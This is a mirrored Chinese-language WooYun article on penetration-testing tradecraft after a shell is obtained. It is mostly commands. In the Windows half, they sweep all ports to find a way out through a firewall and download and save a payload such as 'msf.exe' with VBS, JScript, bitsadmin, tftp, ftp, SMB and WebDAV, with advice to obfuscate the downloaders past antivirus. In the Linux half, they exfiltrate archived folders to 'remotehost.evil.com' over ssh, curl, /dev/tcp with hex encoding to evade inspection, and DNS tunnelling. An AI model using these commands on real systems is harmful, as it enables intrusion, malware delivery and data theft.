作者:
mickey
·
2013/12/10 16:19
作者:[email protected]
Windows
1.判斷什麼埠能出來
有時候有防火牆,你也不知道哪個埠能出來,你只有SHELL,咋判斷什麼埠能出來呢?如果你是在WIN VISTA以下版本,那麼用下面的命令可以啦
FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i")
用TELNET不停的連線你的1-65535埠,你本地開個TCPDUMP就行了,如果連通了,就OK了.
如果TCP封鎖了,可以用UDP
FOR /L %i IN (1,1,65535) DO (cmd /c "start /b nslookup -port=%i wooyun.org 1.2.3.4")
這個就更慢了,但是有效,其中的wooyun.org是你可以設定自己的動態域名
如果是VISTA以後的版本,自帶有POWERSHELL:
下面分別是走TCP和UDP的
function sT($IP,$Port) {$Address = [system.net.IPAddress]::Parse($IP);$End = New-Object System.Net.IPEndPoint $address, $port;$Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork;$Stype = [System.Net.Sockets.SocketType]::Stream;$Ptype = [System.Net.Sockets.ProtocolType]::TCP;$Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype;$Sock.TTL = 26;try { $sock.Connect($End);[Byte[]] $Message = [char[]]"w00tw00t";$Sent = $Sock.Send($Message);$sock.EndConnect($Connect)} catch {};$Sock.Close();};1..65535 | %{ sT -IP "1.2.3.4" -Port $_ }
function sU($IP, [int]$Port){$Address = [system.net.IPAddress]::Parse($IP);$End = New-Object System.Net.IPEndPoint($Address, $port);$Saddrf=[System.Net.Sockets.AddressFamily]::InterNetwork;$Stype=[System.Net.Sockets.SocketType]::Dgram;$Ptype=[System.Net.Sockets.ProtocolType]::UDP;$Sock=New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype;$Sock.TTL = 26;$sock.Connect($end);$Enc=[System.Text.Encoding]::ASCII;$Message = "w00tw00t";$Buffer=$Enc.GetBytes($Message);$Sent=$Sock.Send($Buffer);}; 1..65535 | %{ sU -IP "1.2.3.4" -Port $_ }
2.WIN下傳檔案
如果是VISTA以下版本,可以用TFTP/FTP/TELNET,這個網上文章很多的了,另外如果你搞的是國外的,不要忘記SMB,如果能走HTTP的80,可以用VBS的ADODB.Stream來下載,不過這個已經被很多防毒軟體殺了,編寫的時候編碼混淆下就行了.但不保證能過主動防禦,還是少用,另外zzzEVAzzz的那個Any2Bat可以直接傳檔案,就是體積有限制,不能傳太大的檔案,傳小馬的話應該可以了.如果能走80的話,還可以嘗試下WEBDAV,WIN Vista以後就方便了,直接用內建命令bitsadmin就行了
使用ADODB.Stream來傳檔案
code 1:
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://192.168.1.43/mickey.exe", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\msf.exe":objADOStream.Close
code 2:
function HTTPGetDownload(url, file) {
var http = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
http.open("GET", url);
http.send();
var stream = new ActiveXObject("ADODB.Stream");
stream.type = 1;
stream.open();
stream.write(http.responseBody);
stream.saveToFile(file,2); }
HTTPGetDownload("http://1.2.3.4/mickey.exe", "mickey.exe");
使用bitsadmin來傳檔案:
code 3:
bitsadmin /rawretrun /transfer getfile http://pentest.cc/mickey.exe c:\mickey.exe
走UDP的TFTP:
code 4:
tftp –i 1.2.3.4 GET mickey.exe
使用FTP:
code 5:
echo open 1.2.3.4 > x&echo user 2 2 >> x &echo get mickey.exe >> x &echo quit >> x &ftp -n -s:x
使用TELNET:
情景假設,我是LINUX要傳檔案到WIN上去
首先我在本地的LINUX上用NC執行
nc -lvp 23 < mickey.txt
然後我在WIN上執行
telnet 我的LINUX主機的IP -f c:\mickey.txt
這樣就把我linux主機上的mickey.txt檔案複製到win主機的c盤下了
使用SMB傳送檔案:
情景假設,我是LINUX要傳檔案到WIN上去
首先我在本地的LINUX上配置好SAMBA服務
nano /etc/samba/smb.conf
[hack]
comment = File Server Share
path = /tmp/
browseable = yes
writable = yes
guest ok = yes
read only = no
create mask = 0755
service samba start
然後我在WIN上執行
C:\>net use z: \\192.168.10.80\hack
copy z:\mickey.exe C:\mickey.exe
透過WEBDAV來傳檔案:
net use o: "http://192.168.200.18/uploads"
copy z:\mickey.exe C:\mickey.exe
也可以走HTTPS
net use o: "https://192.168.200.18/uploads"
但是需要在主機上開啟WebClient服務,才能成功
net start WebClient
[email protected],主攻LINUX
Linux
當我們想要把一個伺服器裡面的資料打包備份到另一個伺服器的時候,這些命令可能會有幫助。
1.tar over ssh
一邊tar一邊透過ssh傳到伺服器並且自動解壓縮,最後會得到遠端伺服器上資料夾的一份完美備份,並且在目標伺服器上不會寫入任何檔案。
tar zcf - /some/localfolder | ssh remotehost.evil.com "cd /some/path/name; tar zxpf -"
2. rsync over ssh
透過ssh隧道同步,要求是本地伺服器要安裝了rsync
rsync -aH localhost remotehost.evil.com:/some/path/name
假如ssh預設的22埠被封,那麼你可以用ssh -p 或者 rysnc --port指定埠,比如可以把ssh伺服器開到80或者443埠。
如果連SSH協議都被封了呢,怎麼換埠都沒用怎麼辦?別怕,我們可以把資料透過https傳送:
tar zcf - localfolder | curl -F "data=@-" https://remotehost.evil.com/script.php
curl -F 表示透過偽表單用Post方式傳送資料
當然,你還要在本地建一個script.php用來收取資料然後寫入到檔案才行,並且web伺服器要支援ssl並且有https證照。
不過curl在很多linux發行版裡面都沒有預設安裝,所以還是有時候還是不太靠譜。
那麼現在不能用ssh也不能用curl,那怎麼辦?
直接透過tcp傳送
tar zcf - localfolder >/dev/tcp/remotehost.evil.com/443
大家看這個方式是不是有點眼熟?沒錯,就是和彈shell的方法差不多,只不過這次我們用來傳送檔案。
效果和用nc傳檔案是一樣的。假如遠端伺服器和網路還有內容檢測的話,我們還可以對檔案進行一些編碼來混淆,比如用xxd命令轉換成16進位制 dump
tar zcf - localfolder | xxd -p >/dev/tcp/remotehost.evil.com/443
本地伺服器可以用xxd -r來還原原始檔
其實除了xxd,用 base64也不錯,就是有點明顯……
更奇葩的方法,用DNS來傳送資料:
tar zcf - localfolder | xxd -p -c 16 |
while read line; do host $line.domain.com remotehost.evil.com; done
把打包後的資料用16進位制編碼,每行16位元組,這樣在透過dns傳送到時候就不會因為超長導致出錯。然後我們限制每次只傳送1個ping資料包,減少傳送時間。至於怎麼還原,那就要看你的了。
本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!